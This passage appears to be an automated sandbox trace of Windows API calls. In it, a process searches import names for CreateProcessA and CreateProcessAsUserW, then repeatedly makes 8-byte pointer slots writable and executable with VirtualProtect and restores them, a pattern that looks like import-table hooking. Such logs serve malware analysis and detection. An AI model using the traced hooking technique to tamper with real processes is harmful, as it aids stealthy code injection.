(lpString1="InitializeSRWLock", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="ReleaseSRWLockShared", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="RegCloseKey", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="RegDisablePredefinedCacheEx", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="RegQueryValueExW", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="RegOpenKeyExW", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="RegGetValueW", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="RegEnumKeyExW", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="ExpandEnvironmentStringsW", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="GetCommandLineW", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="CompareStringOrdinal", lpString2="CreateProcessA") returned -1 [0208.038] lstrcmpiA (lpString1="WideCharToMultiByte", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="RpcMgmtStopServerListening", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="I_RpcServerDisableExceptionFilter", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="RpcServerRegisterIf", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="RpcServerUnregisterIfEx", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="RpcServerListen", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="I_RpcMapWin32Status", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="RpcServerUseProtseqEpW", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="RpcServerUnregisterIf", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="RpcMgmtSetServerStackSize", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="RpcMgmtWaitServerListen", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="HeapAlloc", lpString2="CreateProcessA") returned 1 [0208.038] lstrcmpiA (lpString1="HeapFree", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="GetProcessHeap", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="HeapSetInformation", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="LCMapStringW", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="GetTokenInformation", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="SetSecurityDescriptorGroup", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="GetLengthSid", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="AddAccessAllowedAce", lpString2="CreateProcessA") returned -1 [0208.039] lstrcmpiA (lpString1="InitializeSecurityDescriptor", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="SetSecurityDescriptorOwner", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="InitializeAcl", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="SetSecurityDescriptorDacl", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="LocalAlloc", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="LocalFree", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="CloseHandle", lpString2="CreateProcessA") returned -1 [0208.039] lstrcmpiA (lpString1="CreateActCtxW", lpString2="CreateProcessA") returned -1 [0208.039] lstrcmpiA (lpString1="ActivateActCtx", lpString2="CreateProcessA") returned -1 [0208.039] lstrcmpiA (lpString1="DeactivateActCtx", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="ReleaseActCtx", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="RegisterWaitForSingleObjectEx", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="EtwEventWrite", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="EtwEventEnabled", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="EtwEventRegister", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="RtlUnhandledExceptionFilter", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="NtSetInformationProcess", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="RtlSetProcessIsCritical", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="RtlInitializeCriticalSection", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="RtlSubAuthoritySid", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="RtlLengthRequiredSid", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="RtlFreeHeap", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="RtlCopySid", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="RtlAllocateHeap", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="RtlInitializeSid", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="RtlSubAuthorityCountSid", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="RtlImageNtHeader", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="DelayLoadFailureHook", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="ResolveDelayLoadedAPI", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="memcpy", lpString2="CreateProcessA") returned 1 [0208.039] lstrcmpiA (lpString1="CoCreateInstance", lpString2="CreateProcessA") returned -1 [0208.039] lstrcmpiA (lpString1="CoInitializeSecurity", lpString2="CreateProcessA") returned -1 [0208.039] lstrcmpiA (lpString1="CoInitializeEx", lpString2="CreateProcessA") returned -1 [0208.039] lstrcmpiA (lpString1="CLSIDFromString", lpString2="CreateProcessA") returned -1 [0208.039] lstrcmpiA (lpString1="_initterm", lpString2="CreateProcessAsUserW") returned -1 [0208.039] lstrcmpiA (lpString1="exit", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="_initterm_e", lpString2="CreateProcessAsUserW") returned -1 [0208.040] lstrcmpiA (lpString1="__wgetmainargs", lpString2="CreateProcessAsUserW") returned -1 [0208.040] lstrcmpiA (lpString1="QueryPerformanceCounter", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="ExitProcess", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="GetCurrentProcess", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="GetCurrentProcessId", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="TerminateProcess", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="GetCurrentThreadId", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="SetProcessAffinityUpdateMode", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="OpenProcessToken", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="GetSystemTimeAsFileTime", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="GetTickCount", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="RtlVirtualUnwind", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="RtlLookupFunctionEntry", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="RtlCaptureContext", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="SetUnhandledExceptionFilter", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="GetLastError", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="SetErrorMode", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="UnhandledExceptionFilter", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="RegisterServiceCtrlHandlerW", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="StartServiceCtrlDispatcherW", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="SetServiceStatus", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="LoadLibraryExW", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="GetProcAddress", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="FreeLibrary", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="AcquireSRWLockShared", lpString2="CreateProcessAsUserW") returned -1 [0208.040] lstrcmpiA (lpString1="ReleaseSRWLockExclusive", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="LeaveCriticalSection", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="EnterCriticalSection", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="AcquireSRWLockExclusive", lpString2="CreateProcessAsUserW") returned -1 [0208.040] lstrcmpiA (lpString1="InitializeSRWLock", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="ReleaseSRWLockShared", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="RegCloseKey", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="RegDisablePredefinedCacheEx", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="RegQueryValueExW", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="RegOpenKeyExW", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="RegGetValueW", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="RegEnumKeyExW", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="ExpandEnvironmentStringsW", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="GetCommandLineW", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="CompareStringOrdinal", lpString2="CreateProcessAsUserW") returned -1 [0208.040] lstrcmpiA (lpString1="WideCharToMultiByte", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="RpcMgmtStopServerListening", lpString2="CreateProcessAsUserW") returned 1 [0208.040] lstrcmpiA (lpString1="I_RpcServerDisableExceptionFilter", lpString2="CreateProcessAsUserW") returned 1 [0208.041] lstrcmpiA (lpString1="RpcServerRegisterIf", lpString2="CreateProcessAsUserW") returned 1 [0208.041] lstrcmpiA (lpString1="RpcServerUnregisterIfEx", lpString2="CreateProcessAsUserW") returned 1 [0208.041] lstrcmpiA (lpString1="RpcServerListen", lpString2="CreateProcessAsUserW") returned 1 [0208.041] lstrcmpiA (lpString1="I_RpcMapWin32Status", lpString2="CreateProcessAsUserW") returned 1 [0208.041] lstrcmpiA (lpString1="RpcServerUseProtseqEpW", lpString2="CreateProcessAsUserW") returned 1 [0208.041] lstrcmpiA (lpString1="RpcServerUnregisterIf", lpString2="CreateProcessAsUserW") returned 1 [0208.041] lstrcmpiA (lpString1="RpcMgmtSetServerStackSize", lpString2="CreateProcessAsUserW") returned 1 [0208.041] lstrcmpiA (lpString1="RpcMgmtWaitServerListen", lpString2="CreateProcessAsUserW") returned 1 [0208.041] lstrcmpiA (lpString1="HeapAlloc", lpString2="CreateProcessAsUserW") returned 1 [0208.041] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977f30000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff977f30000, AllocationBase=0x7ff977f30000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xb0)) returned 0x30 [0208.041] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.041] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977ab0000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff977ab0000, AllocationBase=0x7ff977ab0000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xb0)) returned 0x30 [0208.041] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.041] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9753d0000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff9753d0000, AllocationBase=0x7ff9753d0000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xb0)) returned 0x30 [0208.041] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.041] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9776c0000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff9776c0000, AllocationBase=0x7ff9776c0000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xb0)) returned 0x30 [0208.041] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.042] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977df0000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff977df0000, AllocationBase=0x7ff977df0000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xb0)) returned 0x30 [0208.042] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.042] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff972350000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff972350000, AllocationBase=0x7ff972350000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xb0)) returned 0x30 [0208.042] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.042] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9773c0000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff9773c0000, AllocationBase=0x7ff9773c0000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xb0)) returned 0x30 [0208.042] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.042] VirtualProtect (in: lpAddress=0x7ff977435428, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0xb0938cf8b0 | out: lpflOldProtect=0xb0938cf8b0*=0x2) returned 1 [0208.043] VirtualProtect (in: lpAddress=0x7ff977435428, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0xb0938cf8b0 | out: lpflOldProtect=0xb0938cf8b0*=0x40) returned 1 [0208.043] VirtualProtect (in: lpAddress=0x7ff977435420, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0xb0938cf8b0 | out: lpflOldProtect=0xb0938cf8b0*=0x2) returned 1 [0208.043] VirtualProtect (in: lpAddress=0x7ff977435420, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0xb0938cf8b0 | out: lpflOldProtect=0xb0938cf8b0*=0x40) returned 1 [0208.043] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977830000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff977830000, AllocationBase=0x7ff977830000, AllocationProtect=0x80, __alignment1=0xb0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.043] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.044] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9774c0000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff9774c0000, AllocationBase=0x7ff9774c0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.044] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.044] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9757b0000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff9757b0000, AllocationBase=0x7ff9757b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.044] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.044] VirtualProtect (in: lpAddress=0x7ff975839728, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0xb0938cf8b0 | out: lpflOldProtect=0xb0938cf8b0*=0x2) returned 1 [0208.045] VirtualProtect (in: lpAddress=0x7ff975839728, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0xb0938cf8b0 | out: lpflOldProtect=0xb0938cf8b0*=0x40) returned 1 [0208.045] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977b60000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff977b60000, AllocationBase=0x7ff977b60000, AllocationProtect=0x80, __alignment1=0xb0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.045] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.045] VirtualProtect (in: lpAddress=0x7ff977c23020, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0xb0938cf8b0 | out: lpflOldProtect=0xb0938cf8b0*=0x2) returned 1 [0208.045] VirtualProtect (in: lpAddress=0x7ff977c23020, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0xb0938cf8b0 | out: lpflOldProtect=0xb0938cf8b0*=0x40) returned 1 [0208.046] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96f280000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff96f280000, AllocationBase=0x7ff96f280000, AllocationProtect=0x80, __alignment1=0xb0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.046] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.046] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff975900000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff975900000, AllocationBase=0x7ff975900000, AllocationProtect=0x80, __alignment1=0xb0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.046] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.046] VirtualProtect (in: lpAddress=0x7ff975ee63b0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0xb0938cf8b0 | out: lpflOldProtect=0xb0938cf8b0*=0x2) returned 1 [0208.046] VirtualProtect (in: lpAddress=0x7ff975ee63b0, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0xb0938cf8b0 | out: lpflOldProtect=0xb0938cf8b0*=0x40) returned 1 [0208.047] VirtualProtect (in: lpAddress=0x7ff975ee63e8, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0xb0938cf8b0 | out: lpflOldProtect=0xb0938cf8b0*=0x2) returned 1 [0208.047] VirtualProtect (in: lpAddress=0x7ff975ee63e8, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0xb0938cf8b0 | out: lpflOldProtect=0xb0938cf8b0*=0x40) returned 1 [0208.048] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974c30000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff974c30000, AllocationBase=0x7ff974c30000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.048] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.048] VirtualProtect (in: lpAddress=0x7ff9750d2758, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0xb0938cf8b0 | out: lpflOldProtect=0xb0938cf8b0*=0x2) returned 1 [0208.048] VirtualProtect (in: lpAddress=0x7ff9750d2758, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0xb0938cf8b0 | out: lpflOldProtect=0xb0938cf8b0*=0x40) returned 1 [0208.048] VirtualProtect (in: lpAddress=0x7ff9750d26b0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0xb0938cf8b0 | out: lpflOldProtect=0xb0938cf8b0*=0x2) returned 1 [0208.048] VirtualProtect (in: lpAddress=0x7ff9750d26b0, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0xb0938cf8b0 | out: lpflOldProtect=0xb0938cf8b0*=0x40) returned 1 [0208.049] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977360000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff977360000, AllocationBase=0x7ff977360000, AllocationProtect=0x80, __alignment1=0xb0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.049] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.049] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9749a0000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff9749a0000, AllocationBase=0x7ff9749a0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.049] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.050] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff975310000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff975310000, AllocationBase=0x7ff975310000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.050] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.050] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9749b0000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff9749b0000, AllocationBase=0x7ff9749b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.050] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.050] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974980000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff974980000, AllocationBase=0x7ff974980000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.050] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.051] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff972240000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff972240000, AllocationBase=0x7ff972240000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.051] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf8b0, ReturnLength=0x0) returned 0x0 [0208.051] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9687b0000, lpBuffer=0xb0938cf970, dwLength=0x30 | out: lpBuffer=0xb0938cf970*(BaseAddress=0x7ff9687b0000, AllocationBase=0x7ff9687b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.051] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf8b0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: 